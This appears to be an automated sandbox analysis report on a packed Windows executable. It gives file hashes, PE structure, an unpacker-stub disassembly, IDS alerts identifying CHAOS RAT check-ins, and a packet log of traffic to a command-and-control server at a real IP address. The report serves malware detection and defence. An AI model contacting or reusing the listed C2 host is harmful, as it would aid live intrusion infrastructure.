MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cgetcfx.pr5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

\Device\Mup\user-PC\PIPE\samr

Download File

Process:	C:\Users\user\Desktop\pointcross.dat.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	7.999960057089601
TrID:	Win64 Executable Console (202006/5) 81.26% UPX compressed Win32 Executable (30571/9) 12.30% Win64 Executable (generic) (12005/4) 4.83% Generic Win/DOS Executable (2004/3) 0.81% DOS Executable Generic (2002/1) 0.81%
File name:	pointcross.dat.exe
File size:	5'921'280 bytes
MD5:	585381bc89179fe4fd758c05ae7049b4
SHA1:	b8df37aeb48b75fa26f6ff8cc9cc213142f98d0d
SHA256:	b66cd936cb687374b4822dc779e08dc1e2ab0b595a59fad709aab94d9f61c12d
SHA512:	a550a2cdd0db4e2c070801ab4756dd79a72adab9a634dad1717747113095a7bb75aed430570fb6bd23d0c9f46f35a6385c887a31dbbb795bf17c45ee5a713ca7
SSDEEP:	98304:uUgCUlXKwwNmruPMUDOJnjRNdeFasthpHxWDSVDVf/D6LY8Hghpxi37BaNChcxAP:DU1qNmykLVdqa00+jYDoyYCeH
TLSH:	85563333C6128B0ED75595F7E8C5BAC0523EC0F46E937C18E4AA57C2EAD56A701EEB01
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......`Z.......S..9....S...@..............................`............`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xee39b0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	6ed4f5f04d62b18d96b26d6db7c18840

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFA5B66Ah]
dec eax
lea edi, dword ptr [esi-0053E025h]
push edi
mov eax, 00AE1053h
push eax
dec eax
mov ecx, esp
dec eax
mov edx, edi
dec eax
mov edi, esi
mov esi, 005A4982h
push ebp
dec eax
mov ebp, esp
inc esp
mov ecx, dword ptr [ecx]
dec ecx
mov eax, edx
dec eax
mov edx, esi
dec eax
lea esi, dword ptr [edi+02h]
push esi
mov al, byte ptr [edi]
dec edx
mov cl, al
and al, 07h
shr cl, 00000003h
dec eax
mov ebx, FFFFFD00h
dec eax
shl ebx, cl
mov cl, al
dec eax
lea ebx, dword ptr [esp+ebx*2-00000E78h]
dec eax
and ebx, FFFFFFC0h
push 00000000h
dec eax
cmp esp, ebx
jne 00007F618CD1D26Bh
push ebx
dec eax
lea edi, dword ptr [ebx+08h]
mov cl, byte ptr [esi-01h]
dec edx
mov byte ptr [edi+02h], al
mov al, cl
shr cl, 00000004h
mov byte ptr [edi+01h], cl
and al, 0Fh
mov byte ptr [edi], al
dec eax
lea ecx, dword ptr [edi-04h]
push eax
inc ecx
push edi
dec eax
lea eax, dword ptr [edi+04h]
inc ebp
xor edi, edi
inc ecx
push esi
inc ecx
mov esi, 00000001h
inc ecx
push ebp
inc ebp
xor ebp, ebp
inc ecx
push esp
push ebp
push ebx
dec eax
sub esp, 48h
dec eax
mov dword ptr [esp+38h], ecx
dec eax
mov dword ptr [esp+20h], eax
mov eax, 00000001h
dec eax
mov dword ptr [esp+40h], esi
dec esp
mov dword ptr [esp+30h], eax
mov ebx, eax
inc esp
mov dword ptr [esp+2Ch], ecx
movzx ecx, byte ptr [edi+02h]
shl ebx, cl
mov ecx, ebx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xae5000	0x9c	UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xabe000	0xe8b0	UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x53e000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0x53f000	0x5a6000	0x5a5600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX2	0xae5000	0x1000	0x200	False	0.1953125	data	1.352949710283797	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4213.183.63.994973280802037145 11/27/23-10:13:59.242019	TCP	2037145	ET TROJAN Win32/Khaosz.A!MTB Checkin	49732	8080	192.168.2.4	213.183.63.99
192.168.2.4213.183.63.994973280802046873 11/27/23-10:13:58.191363	TCP	2046873	ET TROJAN CHAOS RAT CnC Server Status Check	49732	8080	192.168.2.4	213.183.63.99
192.168.2.4213.183.63.994973180802046872 11/27/23-10:11:57.761039	TCP	2046872	ET TROJAN CHAOS RAT Client Checkin	49731	8080	192.168.2.4	213.183.63.99

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2023 10:11:57.011673927 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.011704922 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.011782885 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.012520075 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.012531042 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.270148039 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.270349026 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.270363092 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.270500898 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.270504951 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.271662951 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.271724939 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.350487947 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.350591898 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.350620985 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.393281937 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.397699118 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.397707939 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.445250988 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.552793980 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.552903891 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.552958965 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.553107977 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.553123951 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.553150892 CET	49730	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.553157091 CET	443	49730	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.553663969 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:57.554263115 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:57.756359100 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:11:57.756551027 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:57.757246017 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:57.760345936 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:11:57.760411024 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:57.761039019 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:57.959352016 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:11:57.959743023 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:11:57.967633009 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:11:57.968113899 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:11:57.970833063 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.970855951 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:57.970937014 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.971931934 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:57.971946001 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.003927946 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:58.019654989 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:58.225090027 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.225306988 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.225320101 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.225620985 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.225629091 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.226713896 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.226768970 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.270457983 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.270572901 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.270622015 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.317270041 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.318161964 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.318192005 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.369016886 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.521369934 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.524703979 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.524816990 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.524884939 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.524907112 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.524936914 CET	49733	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:11:58.524943113 CET	443	49733	104.16.133.229	192.168.2.4
Nov 27, 2023 10:11:58.525336981 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:11:58.735075951 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:11:58.783143044 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:01.739635944 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:01.943177938 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:01.960225105 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:01.960275888 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:01.960354090 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:01.961117029 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:01.961124897 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:01.993227959 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:02.218265057 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.218461037 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.218482018 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.218616009 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.218621016 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.219468117 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.219531059 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.220730066 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.220779896 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.220859051 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.220865011 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.267868996 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.507514000 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.507638931 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.507690907 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.507774115 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.507797003 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.507806063 CET	49734	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:02.507811069 CET	443	49734	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:02.507986069 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:02.716562033 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:02.764206886 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:05.717449903 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:05.919898033 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:05.923952103 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:05.924050093 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:05.924134016 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:05.924650908 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:05.924683094 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:05.971869946 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:06.180119991 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.180329084 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.180356979 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.180500031 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.180510998 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.181567907 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.181725979 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.182738066 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.182815075 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.182888031 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.182902098 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.230010033 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.469948053 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.470067024 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.470135927 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.470235109 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.470268965 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.470294952 CET	49735	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:06.470309973 CET	443	49735	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:06.470444918 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:06.676805019 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:06.724421024 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:09.698476076 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:09.901273966 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:09.949275017 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:11.199385881 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.199419975 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.199477911 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.200253963 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.200269938 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.455363989 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.455785990 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.455801010 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.456125021 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.456130981 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.457103014 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.457196951 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.459527969 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.459588051 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.459659100 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.459665060 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.507250071 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.747515917 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.747617960 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.747672081 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.747781038 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.747790098 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.747808933 CET	49736	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:11.747813940 CET	443	49736	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:11.747934103 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:11.957448959 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:12.005287886 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:12.974203110 CET	49731	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:13.181183100 CET	8080	49731	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:14.958559036 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:15.161132097 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:15.180058002 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.180107117 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.180177927 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.180656910 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.180670023 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.212563038 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:15.437730074 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.437884092 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.437900066 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.438021898 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.438025951 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.438973904 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.439027071 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.453810930 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.453872919 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.453928947 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.453933954 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.501056910 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.730556011 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.730667114 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.730850935 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.730892897 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.730906963 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.730918884 CET	49740	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:15.730923891 CET	443	49740	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:15.731106997 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:15.939544916 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:15.987164021 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:18.940629005 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:19.143264055 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:19.149234056 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.149266958 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.149339914 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.149909019 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.149920940 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.197391987 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:19.404210091 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.404607058 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.404619932 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.404655933 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.404659986 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.405802011 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.405874968 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.416793108 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.416919947 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.416939020 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.461261988 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.464351892 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.464365005 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.512033939 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.697098970 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.697211981 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.697273970 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.697547913 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.697562933 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.697572947 CET	49743	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:19.697577953 CET	443	49743	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:19.697729111 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:19.906207085 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:19.954123974 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:22.907408953 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:23.110245943 CET	8080	49732	213.183.63.99	192.168.2.4
Nov 27, 2023 10:12:23.115160942 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.115233898 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.115330935 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.116005898 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.116014957 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.163553953 CET	49732	8080	192.168.2.4	213.183.63.99
Nov 27, 2023 10:12:23.379865885 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.380184889 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.380201101 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.380392075 CET	49744	443	192.168.2.4	104.16.133.229
Nov 27, 2023 10:12:23.380397081 CET	443	49744	104.16.133.229	192.168.2.4
Nov 27, 2023 10:12:23.383925915 CET	443	49744	104.16.133.229	192.168.2.4
